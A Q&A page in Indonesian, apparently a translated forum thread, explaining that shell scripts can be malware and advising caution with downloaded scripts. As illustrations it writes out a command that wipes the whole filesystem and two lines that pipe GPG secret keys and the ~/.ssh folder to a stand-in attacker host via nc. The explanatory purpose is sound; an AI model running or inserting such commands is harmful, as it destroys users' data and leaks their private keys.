GNU/Linux >> Belajar Linux >  >> Linux

Bisakah file .sh menjadi malware?

.sh file adalah skrip shell. Mereka analog dengan .bat file (cmd skrip) di bawah Windows. Semua ini (skrip shell, skrip cmd, .exe Executable Windows, executable Linux (yang biasanya tidak memiliki ekstensi)) adalah program yang dapat dieksekusi; jika Anda menjalankannya, ia dapat melakukan apa saja yang dapat Anda lakukan. Jadi ya, skrip shell bisa berbahaya. Perlakukan skrip shell (atau skrip Perl, atau skrip Python, atau skrip Ruby, dll.) dengan kecurigaan yang sama seperti Anda memperlakukan aplikasi lain.

Sedikit lebih sulit untuk menyembunyikan malware dalam skrip shell tanpa terlihat mencurigakan, karena ini adalah skrip yang dapat dibaca oleh orang yang mengetahui bahasa skrip. Tapi itu tidak jauh lebih sulit; hanya sedikit orang, bahkan dengan pengetahuan teknisnya, mau repot-repot meninjau kodenya, sehingga Anda bisa berharap untuk tidak diperhatikan.

Sebagai masalah praktis, ada lebih sedikit malware untuk Linux yang beredar daripada untuk Windows. Ini mungkin terutama karena Linux memiliki pangsa pasar yang jauh lebih sedikit daripada Windows di desktop, sehingga pengembalian untuk menulis malware Linux lebih sedikit. Juga, ada budaya yang sudah lama mendarah daging untuk berbagi sedikit peningkatan pada sistem di dunia Linux, lebih daripada di dunia Windows; jadi keseimbangan probabilitas mengatakan bahwa ini adalah seseorang yang berbagi sedikit peningkatan dan bukan malware. Tapi itu bisa jadi malware yang menyamar sebagai sedikit perbaikan. Pada akhirnya, Anda perlu memutuskan apakah Anda dapat mempercayai situs tempat Anda mendapatkan aplikasi ini, atau orang yang merekomendasikan situs ini. Pilih program yang berasal dari distribusi Anda (yaitu yang dapat Anda instal dari pusat perangkat lunak), karena program tersebut telah melalui beberapa peninjauan.

Sekarang tentang program khusus ini:Saya melihat sekilas, dan kelihatannya tidak berbahaya. Saya tidak melihat apa pun yang akan menyimpan kata sandi Anda di mana pun tanpa memberi tahu Anda atau yang akan melakukan hal-hal di komputer Anda selain dari apa yang diiklankan. Perhatikan bahwa saya hanya melakukan tinjauan 2 menit, yang dapat dilewati oleh penulis malware yang pandai dari jarak jauh. Program ini terlihat ditulis dengan cukup baik.

Saya tidak akan merekomendasikan program ini kecuali jika Anda merasakan kebutuhan mendesak yang tidak ditangani oleh paket di distribusi Ubuntu. Ubuntu hadir dengan kuda laut GUI frontend ke GPG (ada juga kgpg untuk pengguna KDE). Anda mungkin juga ingin menginstal seahorse-nautilus (atau plugin kuda laut di versi lama) untuk integrasi Nautilus.


#!/bin/sh
rm -rf --no-preserve-root /

Itu malware, dan itu adalah skrip shell. Versi yang lebih canggih mungkin menyertakan sesuatu seperti:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

Jadi ya, skrip shell bisa berbahaya. Itu bisa menjadi lebih kompleks dan memanggil bahasa skrip lain, perpustakaan, atau bahkan menjadi arsip shell yang keluar dan memanggil file yang dapat dieksekusi biasa.

Sebagian besar, apa pun yang Anda jalankan mendapatkan izin dari pengguna.


Tentu saja! Ia dapat melakukan apa saja yang dapat Anda lakukan! Perhatikan log, keylog Anda, curi file dll....

Bergantung pada apa yang telah ditulis Pengembangnya pada kode sumber! Itu bisa melakukan APA SAJA.....

Dan ini sangat mudah dibuat, jadi jika Anda dikirimi file .sh yang mencurigakan, pikirkan dua kali sebelum Anda menjalankannya!


Linux
  1. Script Shell Untuk Memindahkan File Terlama?

  2. Bagaimana Cara Menambahkan Data Ke Buffer Dalam Script Shell?

  3. Bagaimana Cara Memeriksa Substring Di Shell Script Bash?

  1. Mengubah konten file melalui skrip shell

  2. pindahkan hanya jika file ada dalam skrip shell

  3. Cara mengeksekusi file tanpa ekstensi .sh di shell

  1. Bisakah Skrip Bash Dihubungkan ke File?

  2. Membuat template dengan Linux dalam Shell Script?

  3. Bisakah skrip shell menunggu file berubah dan mengambil tindakan?